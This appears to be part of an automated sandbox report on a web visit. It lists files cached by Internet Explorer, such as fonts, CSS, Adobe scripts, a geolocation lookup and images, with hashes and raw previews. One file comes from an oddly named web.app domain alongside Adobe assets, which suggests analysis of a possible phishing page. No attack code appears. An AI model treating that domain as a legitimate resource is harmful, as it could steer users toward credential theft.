                                                                                                                                                                                                                                                        Preview: wOFF......`........l........................DYNA...$.........D..GDYN............L.i.GPOS..........G..9..OS/2.......[...`|.M.VDMX............l.tPcmap.._.........!k`Tcvt ...H...........tfpgm...`.......s.Y.7gasp...d............glyf..&...4...e..V .head...l...4...6..M.hhea...........$....hmtx..Z........(.G$nloca..\...........Jmaxp....... ... ...nname.............!.,post..^t...l.....moprep...T...2...2....x...S.X..D.s.X...Vc....jl5....m.m{:...3.....#..C.P..WB..!..K8}...'.>...6".l$"....b....F4}$*.m4b...ic...$....866q..8.q.o.@o.OB..DzCB..D$..I..$!.MJr.;).d...I... .MI....zAj..4..s...#.MO&=#..mF..)..j3..f!.....6.9....c.... .....6..ln..!y(`.RP..G!....Et.....(f.S\.(B.[...K1J...RFw(AY[.r.M)...T.e..[...-Ge.<Ul...T..*Q.V...BM].*.l5j...ckP.......m-....ih......S.&.>Mu..4..in..B.iLK.V.).u.f...i...mI{..:..t......mK...:C{...t.i:..v...L/....mW..n..I......N.....mo..8.0..a.......l...(..a.2..b..0..v.ct......g.3^....;..:.(&..L.c.....T;.i..8B.x.....>&2.Nb...l.e.s.T.j..oCX`..P...";...
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\d[6]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, CFF, length 46088, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):46088
                                                                                                                                                                                                                                                        Entropy (8bit):7.991344892853239
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:768:cbb1bWj8ZMc7qG0jmQcHDJINQubS5HF9GctB7jiDbtUPL6n9MRXVFtf8u:qb108ngj4tImubIpHWHyWn9MZVfL
                                                                                                                                                                                                                                                        MD5:F6772D5F038A33A09B062FA7D7FD1E73
                                                                                                                                                                                                                                                        SHA1:19295E0771CD244E3C71F7D2D209B9A7309A8DE0
                                                                                                                                                                                                                                                        SHA-256:AF6B2610431D075E5266E7D97EF7B53314F04EC64A56CD8872AD5FFB85DBA88D
                                                                                                                                                                                                                                                        SHA-512:64179523C0D4EFAA89AA10670CB89D91D7B97C9685E5919E7E1D014602634AD98FCA376A8433A9C31B13F0E3AF944EC330A858486F58DA726EA953117FA3575C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/a0c22f/00000000000000003b9b3f84/27/d?primer=388f68b35a7cbf1ee3543172445c23e26935269fadd3b392a13ac7b2903677eb&fvd=i3&v=3
                                                                                                                                                                                                                                                        Preview: wOFFOTTO....................................BASE...D...F...Fe(].CFF ...@.......{].R.DYNA...H.......|.6IlGDYN............v.A.GPOS..........0P.3.(GSUB..............t.OS/2.......[...`[.twcmap...(.......(..TIhead.......4...6..%<hhea.......$...$...^hmtx............:.".maxp...8.........kP.name................post........... ...2..............ideoromn..DFLT..cyrl..grek..latn...................`......x.c`d```5.J.S,........(.p>9..F.......|.........2...x.R.n.@...i%$T.O...];v.&.)i..T.*.z..Mc.?..F....x.>.wn..O.....Z!.j...73..g.x..p.>'.-v...8.[.....,....}............7..........K'...S..{x.|..C.w..Q....x.j......D..=1\....].U^.I1/.MY.Z-..f...7+]...U.e..e*..E...8K....`x>......,.......ZUuZ...^.D }...J=/...J_...<^.R/e.&..d.....VZoN=O.6j.j9/sO.fq....0.'.w.;...9zDC,P".".a...8.*0...3[ac..- ....."..V..f..*r..y....E....n..3..VDE.. ..s.06.......-..(.]....4..u...C...gdE.6.(x/A^....Cfs....p..67I.>2.o\......Sx.._cC..M..~..-.b..'...Y....d=....[..x.c`f..............7.f.b.c0b...r333..p2.(00.300
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\d[7]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, CFF, length 58352, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):58352
                                                                                                                                                                                                                                                        Entropy (8bit):7.992884507564213
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:1536:U2Ph1fS3ZeHACznHaKNlKjE39zfZB4kKAkr:Hvf2OzH/NjlSAs
                                                                                                                                                                                                                                                        MD5:3C48D869909CC053C2EFA6800B492ADD
                                                                                                                                                                                                                                                        SHA1:882C7495CC54A32EF795B89E9E84D1B69C3F87C5
                                                                                                                                                                                                                                                        SHA-256:CFD20EA88B7F7A1B3E18890AAFF228FD6F134095AF8F6DB1F66E4DD551B59306
                                                                                                                                                                                                                                                        SHA-512:0E2ABD3D074418386C6290B0AA5EA09BB8BDC486C715EC426CE1F0D6B48C3EC2EC85EDA7BAAF31375B3481FDCE1DE7886AC0325AA7877F48516D0877F7C061A1
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/ad2a79/00000000000000003b9b3f8c/27/d?primer=388f68b35a7cbf1ee3543172445c23e26935269fadd3b392a13ac7b2903677eb&fvd=n9&v=3
                                                                                                                                                                                                                                                        Preview: wOFFOTTO..........T.........................BASE...D...F...Fe.].CFF ...8..........DYNA.............N..GDYN....... ...Q<@..GPOS......!+..N`b)ihGSUB...$.......N`^.iOS/2.......W...`^B{.cmap...........(..U.head.......4...6..%phhea.......!...$...Uhmtx.......'...Dv;8.maxp...0..........P.name............a..npost........... ...2..............ideoromn..DFLT..cyrl..grek..latn...................U......x.c`d```5.....+...+.3.......P..._.?7.#..@.3..H..cy..x..1n.0...9N..F{..{hZ..;...@39...L.d....;w..#..=@.^.G)....F:X......'.$.......e..j..7.....0w.f...#|v|A.o.{......[...r..:..}q|....q.....Qy.._@tJ.=....+5..U.k.|.....H.j_V..+)&y...fkj........\G...Q.-..1..P..p<....Vb..V..|:...AWuZ...._._*....$eq....U0.E...Z.i..P.#.^.o.._...i......5.T..+.Gq..&x....1$M.B......j..O.;.?a..Gk.. m].!.@.....v..............yJ......B....@.1ko..Y..............5O^.....B..i;...Rel.......I....;zf.k4kFs..>.sd]N...a....0..{.2z..4{...K5Y...w.q.<.......tx.c`f.`na`e``.b.```...q.F..@Qn.f&..&&....v.<#..8.8.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\e2042c70cc1c4a7dd81fb01c353d993dnbr1622136582[1].css
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):1086
                                                                                                                                                                                                                                                        Entropy (8bit):4.943990229770432
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:n/3qtdyuzm96olbOw2XmLxhlFfgaVtnHJX5GL4pr7tnk1A1iGc4bDY8zIXmuA:Pyw60ajXKx/FIWpX5GLW9k53iDjgmuA
                                                                                                                                                                                                                                                        MD5:CB372B95DFCAF79CF09DA253AEDEA8B1
                                                                                                                                                                                                                                                        SHA1:08E7999607C2F6B8EBB5E07681B0F22857D88E94
                                                                                                                                                                                                                                                        SHA-256:118F4D0A8C85BFBE5E7DFA3162E04E73C6FCDA9CF1736B28F9472AA7E03BA2AF
                                                                                                                                                                                                                                                        SHA-512:08476963CF8B4A3DAA000ACE639C9E713D37B0879EEA131287051BD6EEB309C2C267DAE6D36DF48EC093DCE6F4C879095FD0C14482B8B6AEF81077F6BFEFE667
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://rikapcndbn.web.app/jutyrtersdzx/themes/css/e2042c70cc1c4a7dd81fb01c353d993dnbr1622136582.css
                                                                                                                                                                                                                                                        Preview: #outdated {font-family:"Open Sans","Segoe UI",sans-serif;position:absolute;background-color:#f25648;color:white;display:none;overflow:hidden;left:0;position:fixed;text-align:center;text-transform:uppercase;top:0;width:100%;z-index:1500;padding:0 24px 24px 0;}#outdated.fullscreen {height:100%;}#outdated .vertical-center {display:table-cell;text-align:center;vertical-align:middle;}#outdated h6 {font-size:25px;line-height:25px;margin:12px 0;}#outdated p {font-size:12px;line-height:12px;margin:0;}#outdated #buttonUpdateBrowser {border:2px solid white;color:white;cursor:pointer;display:block;margin:30px auto 0;padding:10px 20px;position:relative;text-decoration:none;width:230px;}#outdated #buttonUpdateBrowser:hover {background-color:white;color:#f25648;}#outdated .last {height:20px;position:absolute;right:70px;top:10px;width:auto;display:inline-table;}#outdated .last[dir=rtl]{left:25px !important;right:auto !important;}#outdated #buttonCloseUpdateBrowser {color:white;display:block;font-size
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\icon-footer-facebook[1].svg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):423
                                                                                                                                                                                                                                                        Entropy (8bit):4.868918333773956
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:t9D/0IHZJwB5MK7Nj8/66L/fUSCZ3GM65nKFw:t9D/0+677p8/fLnUSC4MMnKFw
                                                                                                                                                                                                                                                        MD5:79B5A539C142059EE68CA83E8846C412
                                                                                                                                                                                                                                                        SHA1:97EBB1258C37BB6BCA866A4EFF63D67F8960D3FF
                                                                                                                                                                                                                                                        SHA-256:AE7F81F5F3D2679D1C7D4E099F16A37D5B61A5E9F580FBCB175DFFE53516A623
                                                                                                                                                                                                                                                        SHA-512:149DB16384AAAC76EC5C351CBA4A6B98700B253F982884B759000E7712264EE48EC6FE8666FFD6DC81AF3215CB03CCFC238FF8534C529C7D46599834048F7397
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/images/icon-footer-facebook.svg
                                                                                                                                                                                                                                                        Preview: <svg height="67" viewBox="0 0 67 67" width="67" xmlns="http://www.w3.org/2000/svg"><path d="M29.765 50.32h6.744V33.998h4.499l.596-5.624h-5.095l.007-2.816c0-1.466.14-2.253 2.244-2.253h2.812V17.68h-4.5c-5.405 0-7.307 2.729-7.307 7.317v3.377h-3.369v5.625h3.369V50.32zM34 64C17.432 64 4 50.568 4 34 4 17.431 17.432 4 34 4s30 13.431 30 30c0 16.568-13.432 30-30 30z" fill-rule="evenodd" clip-rule="evenodd" fill="#717f8a"/></svg>
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\imslib.min[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):46020
                                                                                                                                                                                                                                                        Entropy (8bit):5.247108485619506
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:6y/BMM1ALvYYtNwaIQzhxmQuLWpXcFJw+YoSorR:hgjia012XcFJHYoSo1
                                                                                                                                                                                                                                                        MD5:B439B689448BCAF4ED270F5AF5477C37
                                                                                                                                                                                                                                                        SHA1:6E71ACE46CA64143CA6C7373D2C3DB960EB8F5C0
                                                                                                                                                                                                                                                        SHA-256:4492E3E27970CDEF4E460DA2FA944B12C09AF19575447F91DFECD9D587818A0B
                                                                                                                                                                                                                                                        SHA-512:9541DBAEBE8CC3DA98259BFD0AFB003BEFF471C91CACBA35E446B199D961C55DA1642485B6E00F73949AB65BA9C2EC5EBE7E48833FD61588B18C10C8FDD4D9FF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://static.adobelogin.com/imslib/imslib.min.js
                                                                                                                                                                                                                                                        Preview: /*! imslib.js 1.13.0 18d23dc-b2b44fe */.Array.prototype.every||(Array.prototype.every=function(e,t){"use strict";var n,i;if(null==this)throw new TypeError("this is null or not defined");var o=Object(this),r=o.length>>>0;if("function"!=typeof e)throw new TypeError;for(1<arguments.length&&(n=t),i=0;i<r;){if(i in o)if(!e.call(n,o[i],i,o))return!1;i++}return!0}),Array.prototype.forEach||(Array.prototype.forEach=function(e,t){var n,i;if(null===this)throw new TypeError(" this is null or not defined");var o=Object(this),r=o.length>>>0;if("function"!=typeof e)throw new TypeError(e+" is not a function");for(1<arguments.length&&(n=t),i=0;i<r;){i in o&&e.call(n,o[i],i,o),i++}}),Array.prototype.includes||(Array.prototype.includes=function(e,t){"use strict";if(null==this)throw new TypeError("Array.prototype.includes called on null or undefined");var n=Object(this),i=parseInt(n.length,10)||0;if(0===i)return!1;var o,r,s=parseInt(t,10)||0;for(0<=s?o=s:(o=i+s)<0&&(o=0);o<i;){if(e===(r=n[o])||e!=e&&r!=r
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\location[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):182
                                                                                                                                                                                                                                                        Entropy (8bit):4.685293041881485
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:LUfGC48HlHJ2R4OE9HQnpK9fQ8I5CMnRMRU8x4RiiP22/90+apWyRHfHO:nCf4R5ElWpKWjvRMmhLP2saVO
                                                                                                                                                                                                                                                        MD5:C4F67A4EFC37372559CD375AA74454A3
                                                                                                                                                                                                                                                        SHA1:2B7303240D7CBEF2B7B9F3D22D306CC04CBFBE56
                                                                                                                                                                                                                                                        SHA-256:C72856B40493B0C4A9FC25F80A10DFBF268B23B30A07D18AF4783017F54165DE
                                                                                                                                                                                                                                                        SHA-512:1EE4D2C1ED8044128DCDCDB97DC8680886AD0EC06C856F2449B67A6B0B9D7DE0A5EA2BBA54EB405AB129DD0247E605B68DC11CEB6A074E6CF088A73948AF2481
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: jsonFeed({"country":"CH","state":"ZH","stateName":"Zurich","zipcode":"8152","timezone":"Europe/Zurich","latitude":"47.43000","longitude":"8.57180","city":"Zurich","continent":"EU"});
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\m-setup-9f808447[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):21489
                                                                                                                                                                                                                                                        Entropy (8bit):5.017049351374479
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:hSeHjFWqmemiJvBZKCeTzcjvtaQwFyw3OhaNxQQgIx8MZe:hLHj4qLZKCeetaQwf3OhaNxmIxRZe
                                                                                                                                                                                                                                                        MD5:E506A21C909F422EC580D07AE67D02A9
                                                                                                                                                                                                                                                        SHA1:433ACE5C2D8E30329CCF06F20EBD5716D28C3A97
                                                                                                                                                                                                                                                        SHA-256:013173243A5FC47030B79878154FE50E0075F4111FA071E5459A10206E18D0EC
                                                                                                                                                                                                                                                        SHA-512:C0FBDFB3EDE721792889765FA91653AEB22675503C4324EE96D185A2013217535B88646F7A1CEEACC9A0020C2B56C82F7FF2BEBA7CC08E7862CB9E866B5C93F9
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/m-setup-9f808447.js
                                                                                                                                                                                                                                                        Preview: var globalObject={};"undefined"!=typeof window?globalObject=window:"undefined"!=typeof self?globalObject=self:"undefined"!=typeof global&&(globalObject=global),globalObject._prjtmrvlsetup={buildVersion:"773541f915a72c91d9d8",environment:"prod",snapi:"cc-spark-services-snapi-prod[SUFFIX].adobe.io",postsnapi:"projectm-postsnapi.adobe.io",postsnapi2:"postsnapi.adobe.io",fluxo:"fluxo-us-east-1.prod.adobesnapi.com",ss:"cc-api-storage-creativesdk.adobe.io",links:"links.adobe.io",sparkEduHost:"https://spark-cs.adobe.io",collab:"invitations.adobe.io",behancePublicProfile:"https://cc-api-behance.adobe.io/v2/users/",cid:"MarvelWeb3",imsac:"marvel.adobe.com",imsDebugMode:!1,imss:"static.adobelogin.com/imslib",imsh:"https://ims-na1.adobelogin.com",imsCommonScope:"openid,creative_sdk,gnav,sao.spark,additional_info.projectedProductContext,tk_platform,tk_platform_refresh_user,creative_cloud,ab.manage,sao.typekit,mps,read_organizations",blogAPI:"https://blog.adobespark.com/wp-json/wp/v2/",instagramCli
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\m-unsupported-88cd3215[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):1641442
                                                                                                                                                                                                                                                        Entropy (8bit):5.473866996545552
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:49152:ZQZqBr4+BR5okkiRb8GRuXAiT6VcHad+sJOfV+kYFYkw8c7SjAAsYuMOcdSll:L5FckkihqXT
                                                                                                                                                                                                                                                        MD5:E4216F66DAE5AEF0264C54EFBA38DFB7
                                                                                                                                                                                                                                                        SHA1:0DD6C2AE19455C49E4820FB57C7A28AB22D5C2AE
                                                                                                                                                                                                                                                        SHA-256:DD6B957EFABFE9FF7EF0F508C191DC635C269F7C3E192E7641D1878FD210829A
                                                                                                                                                                                                                                                        SHA-512:0C3857B94D51B83FF1BD6084AAF9EAC08B00D25933A0CE64AD6550F81137A16DB5769589F88652BF8FA994BD6C2FDBBFA6D44E254071368C5EB27F8E1BC5711D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/static/m-unsupported-88cd3215.js
                                                                                                                                                                                                                                                        Preview: !function(e){function t(t){for(var n,r,o=t[0],a=t[1],s=0,l=[];s<o.length;s++)r=o[s],Object.prototype.hasOwnProperty.call(i,r)&&i[r]&&l.push(i[r][0]),i[r]=0;for(n in a)Object.prototype.hasOwnProperty.call(a,n)&&(e[n]=a[n]);for(c&&c(t);l.length;)l.shift()()}var n={},r={"m-unsupported":0,3:0,"vendors~brand-kit-controller~gic-voice-publishUtils~m-storage":0,6:0,"brand-kit-chooser-view~m-storage":0,"brand-kit-chooser-view~user-profile-view":0,"vendors~BumperViewModule":0,12:0,13:0,16:0,21:0},i={"m-unsupported":0,3:0,"vendors~brand-kit-controller~gic-voice-publishUtils~m-storage":0,6:0,"brand-kit-chooser-view~m-storage":0,"brand-kit-chooser-view~user-profile-view":0,"vendors~BumperViewModule":0,12:0,13:0,16:0,21:0};function o(t){if(n[t])return n[t].exports;var r=n[t]={i:t,l:!1,exports:{}};return e[t].call(r.exports,r,r.exports,o),r.l=!0,r.exports}o.e=function(e){var t=[];r[e]?t.push(r[e]):0!==r[e]&&{"m-react-spectrum":1}[e]&&t.push(r[e]=new Promise((function(t,n){for(var i=e+"-"+{0:"aea76d9f
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\main.no-promise.min[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):10741
                                                                                                                                                                                                                                                        Entropy (8bit):5.442372384249071
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:JtsMOjdwfVbwVhYeB8qfRiaAWfjIVHY7W35Qg6SF6gZhfRmlW1YDqs+qg:JtsMydwfVsVhYhqf0aAWfjIm70eVM6gH
                                                                                                                                                                                                                                                        MD5:CCA018E06A68F94A49E79B2B87096FBC
                                                                                                                                                                                                                                                        SHA1:1DC051BD56CA3E2B0ED6E95AE56FC449831062D3
                                                                                                                                                                                                                                                        SHA-256:350A14AAA52348E4768E8146C3449D7789C92344C4537CE31CF137711E5A90E1
                                                                                                                                                                                                                                                        SHA-512:A90B93282F61F721F40E8010D6B2F9D06017F622CA5CE21E370D55C4DB0EAEDDD8DAE114C79CB12223F2024E1BCED55903CC852DD36D42C14FA89D123DA1C448
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/marketingtech/main.no-promise.min.js
                                                                                                                                                                                                                                                        Preview: !function(){"use strict";var e=document,t=Object.defineProperty,n="replace",a=function(e){return e=e[n](/%2523access_token%253D.*?%2526/gim,"%2526")[n](/%23access_token%3D.*?%26/gim,"%26")[n](/#access_token=.*?&/gim,"&")[n](/information=[^\&]+/,"")[n](/puser=[^\&]+/,"")[n](/fnuser=[^\&]+/,"")[n](/lnuser=[^\&]+/,"")};try{var o="referrer",i=e[o],r=a(i);r!==i&&t(e,o,{configurable:!0,value:r})}catch(e){}var c=window,l=c.console.log;function d(e){throw Error(e)}var s,f,u,p,h,g,b,v,m,_=c.__satelliteEmbedCode,y=c.marketingtech,E="digitalData",O=E+".",C="object",D="array",N="function",k="sub-object not ",x=k+C,S=k+D,P=/^(.+?)((?:\[(?:n|\d+)\])+?)$/,j=/n|\d+/g,w=Array.isArray,T=0,I=y&&y.digitalData&&y.digitalData.debug;if(v=function(e){return typeof e},m=function(e,t){return e.hasOwnProperty(t)},(u=(f=function(e,n){var a,o=this;if(t(o,"_id",{value:++T}),I&&l(o._id+": CREATED"),t(o,"_pending",{value:{}}),t(o,"_listeners",{value:{}}),e&&o._set(E,e),n)for(a in n)m(n,a)&&o._set(a,n[a])}).prototype)
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\marvel-landing-unsupported-ec51f18c[1].css
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):92372
                                                                                                                                                                                                                                                        Entropy (8bit):4.941174507427571
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:6HnTWlRCnXfH3Jy4xYuwO8gVR8xyDDtxu5+gBiEffU9+Zz8AMwKpLDtn+jFY5:6HnrnXfH3bxYxOAU5
                                                                                                                                                                                                                                                        MD5:C619CDA442CF0F3808A18ECDEC51F18C
                                                                                                                                                                                                                                                        SHA1:A2D5784420901F3B9BA979EEB50C3BF769ADA3A2
                                                                                                                                                                                                                                                        SHA-256:D53F86A45B7263BECE92128951805436235C90CC77F67FA45188EE6BEF7BA4FF
                                                                                                                                                                                                                                                        SHA-512:2E0DD30F9AB1D50451F013EA25CABE03D599AEDF1F0B18F3BE200BEBACD25460D2D844547155F32283715AC78D433CDF5F2E186FF883F36E9FD6BF685FDD3352
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/css/marvel-landing-unsupported-ec51f18c.css
                                                                                                                                                                                                                                                        Preview: .glb-nav-menu{overflow:hidden}.glb-nav-overlay{position:fixed;top:0;height:0;width:0;z-index:-1;cursor:pointer}.glb-nav-overlay.menu-opening{background-color:hsla(0,0%,100%,0)}.glb-nav-overlay.menu-opened,.glb-nav-overlay.menu-opening{transition:background-color .5s ease-in;height:100%;width:100%;z-index:200}.glb-nav-overlay.menu-opened{background-color:hsla(0,0%,100%,.75)}.glb-nav{background:#35414c;position:fixed;overflow-x:hidden;overflow-y:auto;margin:0;padding:0;box-shadow:1px 0 5px 0 rgba(50,50,50,.75);-ms-overflow-style:none}.glb-nav a:hover{color:#fff}.glb-nav::-webkit-scrollbar{display:none}.glb-nav-top{position:static;margin:0;padding:0;border:1px solid transparent;min-height:calc(100vh - 125px)}.glb-nav-btn{-webkit-flex:1;flex:1;display:block;background:none;outline:none;cursor:pointer;text-align:center}.glb-nav-circle{outline:none;border-radius:50%;width:48px;height:48px;margin:0 auto 10px;background-image:url(/images/plussign.svg);background-position:50%;background-repeat:
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_11509db7f6d2114f580490ba33b5f8b113df45a01[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):12488
                                                                                                                                                                                                                                                        Entropy (8bit):7.985091843499927
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:g+tRi7RhoNKL/AOzYh6oOXsZgZY/bn0wtmEP/y1cjNdOucFH51xpSTpisTxGv/6i:PAFhV4h6oVwwmE3yuy1HyMSxg6j9tOBT
                                                                                                                                                                                                                                                        MD5:C64C86FE6BF1E64917CD40F51A3F0212
                                                                                                                                                                                                                                                        SHA1:EE0AD8959A9619AB9ECF6447A73233C38998993B
                                                                                                                                                                                                                                                        SHA-256:E5F1BD8E854076333BB35D12C7C8AA4764F2F9692A9DB079E0D2B0EFC80BF426
                                                                                                                                                                                                                                                        SHA-512:963B7283782186407DEA17459D9B9FF8FFBAB34574849D391688D8F0B5427FE240892C0107B3D03A4C46878CDD491E7C613DBCE9157C6C07DF15F6DB6DF35BCF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_11509db7f6d2114f580490ba33b5f8b113df45a01.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.0..WEBPVP8 .0......*..k.>u2.H$..!'.[...bn.rP...d..f_...........7.........|...@.......7..u....{...~.....{......e...I.o.....PO...}n.S?.z.~......b...k.7........nn..Y..........C.....=..W..........Jj...6..........W./...^`........`_....e}....'.O`...e...].......7....J....#.....]f.......j.Z...-..K.<....'.9.t.i?.../.R..m=..-I......^^:. @.GH.......6.J.?.xq.8.....w...d.D.e.xU'.H/\+.../...^.3J...8.#d.....j!..."....U.E.(....v.......X)A...w.q w..jnlQg..h.}%H{...u..;.r..^..T.K....Z.+<g.8....'v.O.s....S.hO...xc. a..y.t.X.. %.rh..gJ......8..+.rC......6.%.%e$...-.2....|.g.....\....[.3..G7>.....1.N..N:.......R.EXw3in.5..j...Rm?.O=.q.....:.....'......x.A..M.t.....N..;7......*s....FTw7?.......3.d...`#H...o_..7...U.tV..M.p......b..j1...K.d.m.{e~..y...O../...B6......;...?.A.w....%.{I.$aWS..v..%&.z>Ut'.t.....o..I.iB.K.<.{b..+.B..Y..... .+..C...1.q...r..?".Z....<.....P........z.`[T..8|.8......g...B.-.. 0-.p.........T....!...r.pN.....|o.=a.pR.J;r}..(.c.r..-.,..E
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_11ac71813080b7ad80d8486ba8212b564a66f1d25[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):8602
                                                                                                                                                                                                                                                        Entropy (8bit):7.980706577311374
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:0Vb5mwlQbI9SDD9SEpabX0yTyPB5i3Ky5y6qfo5GmE:0/MqSsECXsZ5k4vmE
                                                                                                                                                                                                                                                        MD5:3519DBDEC738221B4ED56F146889B0C5
                                                                                                                                                                                                                                                        SHA1:8368D90BB91AB4BF312B31A0959AE311AEE8FB7E
                                                                                                                                                                                                                                                        SHA-256:F3884FE1C01470D8BDA7E399CF81D46299FFC11C39FD6F2C74A164607505B0BB
                                                                                                                                                                                                                                                        SHA-512:570E2481C9A11A30EE6E7025248FC2518B1416F37F2BD3134FE4EBD6BBC870E017F95CE329DAB48F3B28D4CD138AE14F8BC4AEEB175FB0710E503141F3ACDDEF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_11ac71813080b7ad80d8486ba8212b564a66f1d25.png?width=2000&format=webply&optimize=medium
